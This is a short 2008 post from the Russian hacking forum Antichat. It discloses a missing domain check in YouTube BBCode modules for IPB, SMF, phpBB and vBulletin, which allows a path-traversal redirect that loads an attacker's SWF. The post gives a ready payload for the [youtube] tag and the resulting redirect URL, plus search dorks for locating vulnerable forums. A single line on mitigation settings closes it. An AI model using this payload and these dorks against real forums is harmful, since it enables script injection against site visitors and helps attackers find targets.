Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Vulnerability Youtube [BB Code] (https://forum.antichat.xyz/showthread.php?t=68205)

ettee 24.04.2008 01:28
Vulnerability Youtube [BB Code]
 
В составляющей части существующих модулей отсутствует проверка домена, что дает для атакующего возможность редиректа с помощью getURL.

PHP код:
youtube.com/v/[param_here]

$txt['youtube'] = 'YouTube'
Пример:
[youtube]../redirection?page=http://exploit.swf/[/youtube]

Получение активного редиректа:
PHP код:
http://www.youtube.com/v/../redirection?page=http://exploit.swf/ 
Присутствие модуля:
IPB
SMF
phpBB
vBulletin
etc

Воизбежание атаки рекомендуется использовать allowScriptAccess="never" / allownetworking="internal" / регулярное выражение.

dork:
BB Code : [yt] [/yt] /forum/
BB Code : [youtube] [/youtube] /forum/


Время: 21:59